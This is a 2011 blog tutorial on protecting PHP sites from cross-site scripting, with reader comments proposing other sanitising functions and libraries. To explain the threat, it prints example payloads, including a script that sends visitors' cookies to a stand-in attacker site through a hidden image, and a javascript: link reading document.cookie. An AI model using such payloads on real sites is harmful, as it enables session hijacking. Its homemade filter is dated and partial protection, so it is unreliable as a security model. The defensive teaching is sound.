How To Protect Your Site From XSS With PHP
June 8th 2011
Cross-Site Scripting (XSS) is a type of attack where a hacker attempts to inject client-side scripting into a webpage that others are able to view. The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged-in user's credentials (commonly saved in browser cookies). With a user's credentials, a hacker could gain access to sensitive parts of your website or web application. In this simple guide, I'll show you a few ways to protect your website from XSS with PHP.
The Basics Of An XSS Attack with Example
If you allow user input on your site or application (like comments, forums, etc.), you could be the target of an XSS attack. The hacker's goal is to submit a comment, forum post, etc. with JavaScript code inside and have it executed on the web page. Since these types of user input can immediately be displayed to other users, the attack could spread quickly and even without your knowledge. For an example, we'll use comments on my website:
Let's say some hacker comes along (his name is John) and submits a comment with <script>alert('XSS!');</script> in the body of the comment. When John refreshes the page, he sees an alert message pop up that says "XSS!". His attack worked!
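To make the mechanism concrete, here is a minimal sketch of the kind of rendering code that lets John's comment through. The article does not show how its comments are printed, so the function name and markup below are assumptions for illustration only:

```php
<?php
// Hypothetical rendering helper (not from the article): it prints the
// comment body exactly as submitted, with no escaping at all.
function render_comment_unsafe(string $body): string
{
    return '<div class="comment">' . $body . '</div>';
}

// John's comment reaches the page unchanged, so the browser runs the script.
echo render_comment_unsafe("<script>alert('XSS!');</script>"), PHP_EOL;
```

Because the body is concatenated straight into the page, the browser cannot tell John's markup apart from the site's own.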
All John does in this example is create an annoyance to users; he doesn't actually steal any information. However, since that attack went through so easily, John may be thinking of other things he could do, like stealing cookies! In JavaScript, cookies are accessible from the document object (i.e. document.cookie). John could easily send the cookies of any user who visits the page his comment is posted on to his own website by posting the following in the body of the comment form:
<script>document.write("<img src='http://johns-site.com/?cookies='"+document.cookie+"' style='display:none;' />");</script>
Why does that work? When your browser loads a webpage, it requests every image on that page. If the SRC attribute of an image points to a URL like the one above, your browser sends a request to John's site with your cookies in the query string, where John can record them. If John receives cookies that are used to validate a user login, he could use those cookies to gain access to, perhaps, an administrative control panel and do even more damage! Also notice that he set the display property of that element to "none", which hides the image from users. John could post a valid comment about the article and execute that script without anyone knowing what he's doing! The rule of thumb here is to NEVER TRUST USER INPUT!
How To Filter Out XSS Using PHP
PHP has a couple of different functions you can use to filter user input, namely htmlentities() and strip_tags().
The htmlentities() function translates all applicable characters to their HTML entity counterparts. For example, using this function < would become &lt; and > would become &gt; (i.e. <script> would become &lt;script&gt;). This function is good for escaping data and might prevent some types of attack, but not all (thanks to IE6). When using the htmlentities function, make sure the second argument is set to ENT_QUOTES, like this:
htmlentities("<script>alert('XSS!');</script>", ENT_QUOTES);
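As a small sketch of what that call produces, the snippet below wraps it in a helper and prints the result. The helper name escape_html and the explicit "UTF-8" charset argument are assumptions added for illustration; the article only passes ENT_QUOTES:

```php
<?php
// Hypothetical helper: htmlentities() with ENT_QUOTES so that both
// single and double quotes are encoded, plus an explicit charset.
function escape_html(string $text): string
{
    return htmlentities($text, ENT_QUOTES, 'UTF-8');
}

echo escape_html("<script>alert('XSS!');</script>"), PHP_EOL;
// prints: &lt;script&gt;alert(&#039;XSS!&#039;);&lt;/script&gt;
```

The browser shows the escaped string as literal text, so the script tag is displayed rather than executed.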
You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities: a hacker doesn't need to use the <script> tag in hyperlinks to get JavaScript to execute). So what can you do? You can use PHP to search for "script" and replace it with scr<b></b>ipt. Cutting up the code like this will prevent it from executing while still displaying the output.
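The hyperlink problem can be illustrated with a short sketch. It assumes a site that has decided to allow the <a> tag through strip_tags(); the helper name is made up for this example:

```php
<?php
// Hypothetical helper: strip all tags except <a>, as a site that
// wants to allow links in comments might do.
function strip_but_keep_links(string $html): string
{
    return strip_tags($html, '<a>');
}

$input = '<a href="javascript:alert(document.cookie);">click here</a>'
       . '<script>alert(1)</script>';

echo strip_but_keep_links($input), PHP_EOL;
// prints: <a href="javascript:alert(document.cookie);">click here</a>alert(1)
```

The <script> tags are removed, but the allowed link keeps all of its attributes, including the javascript: URL, so clicking it would still run the attacker's code.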
The XSS_PROTECT Function
Let's create a PHP function that will filter out any data that may have XSS code inside of it:
/**
* Method: xss_protect
* Purpose: Attempts to filter out code used for cross-site scripting attacks
* @param $data - the string of data to filter
* @param $strip_tags - true to use PHP's strip_tags function for added security
* @param $allowed_tags - a list of tags that are allowed in the string of data
* @return a fully encoded, escaped and (optionally) stripped string of data
*/
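function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
    // Optionally remove HTML tags, keeping any allowed tags plus <b>
    if ($strip_tags) {
        $data = strip_tags($data, $allowed_tags . "<b>");
    }
    // Encode special characters (including both quote styles) as HTML entities
    $result = htmlentities($data, ENT_QUOTES);
    // Split every "script", in any letter case, with an empty <b></b> pair
    if (stripos($data, "script") !== false) {
        $result = preg_replace('/(scr)(ipt)/i', '$1<b></b>$2', $result);
    }
    return $result;
}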
You can send this function any type of user input and it will return the same input, but fully escaped and encoded. This function first checks to see if the data contains the word "script" anywhere; if it doesn't, it just encodes/escapes the data and returns it. If, however, the stripos function finds "script" somewhere, it encodes/escapes the data, replaces all occurrences of "script" with scr<b></b>ipt and then returns the modified result.
There are a couple of things to notice about this function. First, the stripos function is a way to check for the existence of a substring within a string without regard to case (i.e. it will find "script", "sCrIpT" or "SCRIPT"). Second, comparing the result of the stripos function to false with "!==", instead of "!=", is important since the stripos function can return a non-boolean value which evaluates to false (namely 0, when the match is at the very start of the string). Using "!==" compares both the types and values while using "!=" compares just the values. See the PHP documentation on the stripos function for more information.
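The difference between the two comparisons shows up when "script" is the first thing in the string. This is a minimal sketch with two made-up helper names that differ only in the operator they use:

```php
<?php
// Hypothetical helpers: identical except for the comparison operator.
function contains_script_loose(string $s): bool
{
    return stripos($s, 'script') != false;   // compares values only
}

function contains_script_strict(string $s): bool
{
    return stripos($s, 'script') !== false;  // compares type and value
}

// stripos() returns 0 here because the match starts at position 0.
var_dump(contains_script_loose('SCRIPT at the start'));   // bool(false)
var_dump(contains_script_strict('SCRIPT at the start'));  // bool(true)
```

With the loose comparison, the position 0 is treated as false and the match is missed, which is exactly the case an attacker would aim for.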
You can optionally specify whether you want the function to strip any HTML tags from the data string by setting the second parameter of the function to true. The third parameter can then be used to specify which HTML tags are allowed in the data string (which becomes the second argument to PHP's strip_tags function).
Here are a couple of examples of how to use this function:
//returns fully encoded/escaped content from comment
$data = xss_protect($_POST['comment_data']);
//outputs (HTML source): &lt;scr<b></b>ipt&gt;alert(&#039;XSS!&#039;);&lt;/scr<b></b>ipt&gt;
echo xss_protect("<script>alert('XSS!');</script>");
//outputs: click here
echo xss_protect('<a href="javascript:alert(document.cookie);">click here</a>', true);
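The third parameter is worth a quick look too. The sketch below repeats the two steps xss_protect() applies when $strip_tags is true and the input does not contain "script"; the function name strip_then_escape is made up for this example, and it is only an approximation of that code path:

```php
<?php
// Hypothetical stand-in for the strip-then-encode path of xss_protect().
function strip_then_escape(string $data, string $allowed_tags = ""): string
{
    // Step 1: remove every tag except the allowed ones plus <b>
    $data = strip_tags($data, $allowed_tags . "<b>");
    // Step 2: encode whatever is left, including the tags that were kept
    return htmlentities($data, ENT_QUOTES);
}

echo strip_then_escape('<i>Nice</i> <u>post</u>!', '<i>'), PHP_EOL;
// prints: &lt;i&gt;Nice&lt;/i&gt; post!
```

Note that the allowed <i> tag survives strip_tags() but is then encoded, so it shows up on the page as literal text rather than as italics.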
Never Trust User Input
No solution is going to be perfect, but at least now you have a head start! If you have ways of improving this function, let me and everyone else know in the comments. Thanks for reading!
Discussion
06/10/2011
I am confused: a hyperlink is just another tag (<a href=""></a>) that is stripped by the strip_tags() function. I sort of see your point if you are allowing the "a" tag within the strip_tags() function, but once I have reached the point where I allow the user to do any html input I would place more faith in an html sanitizer such as HTMLPurifier or something.
06/10/2011
I haven't used HTMLPurifier myself, but I've seen other people recommending it. It looks like a great library for making sure your code is XSS free. However, be aware that HTMLPurifier isn't exactly a fast running solution. Taken from their FAQs page:
"HTML Purifier isn't exactly light or speedy; this is a tradeoff for the power and security the library affords. You can combat this by reading Speeding up HTML Purifier or using the standalone version." http://htmlpurifier.org/docs
If I were the one implementing their solution, I'd be using their standalone version and speeding that up as much as I can. You definitely don't want your application hanging... Just make sure you know the ins and outs of any solution you end up using.
Thanks for pointing this out though, it definitely needed clearing up.
06/10/2011
http://www.php.net/manual/book.filter.php
06/13/2011
Don't reinvent the wheel, try PHPIDS, it's a really great XSS detection system. https://phpids.org/
06/13/2011
Obviously in some specific cases it's necessary, but as a general validation function I don't think it's right to include it.
For example, if I want to type "Underlined" and you strip my tags, it will just show as "Underlined" which is unexpected from a users POV. The correct output should be "<u>Underlined</u>"
Also, I believe in some browsers alert(1); may work. Same with line breaks.
I don't see why htmlentities with ENT_QUOTES isn't enough?
This is a function I use on one of my sites to show text as the user typed it (including line-breaks).
function display_html($string, $nl2br=true) {
    $string = htmlentities($string, ENT_QUOTES, "utf-8"); // Convert normal chars
    if ($nl2br) {
        $string = nl2br($string);
    }
    $string = stripslashes($string);
    return $string;
}
If I wanted to allow tags, I think the best method would be to create a new function to convert patterns back to html.
06/13/2011
My first example and first quote was wrapped in html "u" tags. That's the point I was trying to make.
06/13/2011
If you want to allow users to be able to enter HTML markup, the only route you can go is with HTMLPurifier http://htmlpurifier.org/ (or a similar library), which attempts to turn the user input into standards compliant HTML before stripping out the bad. It gets pretty much every vector listed in the list above, but at a large performance cost.
Thanks for drawing attention to this important topic!
06/14/2011
I've just felt safe with some functions like strip_tags or htmlentities. but due to your tips I'll think about it again.
12/02/2012
You may include such a function in the main file to control all POST requests.
12/02/2012
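function deXSS() {
    // Escape every string value in $_POST and store the result back
    foreach ($_POST as $k => $v)
    {
        if (is_string($v)) {
            $_POST[$k] = htmlspecialchars($v, ENT_QUOTES);
        }
    }
    return true;
}
deXSS();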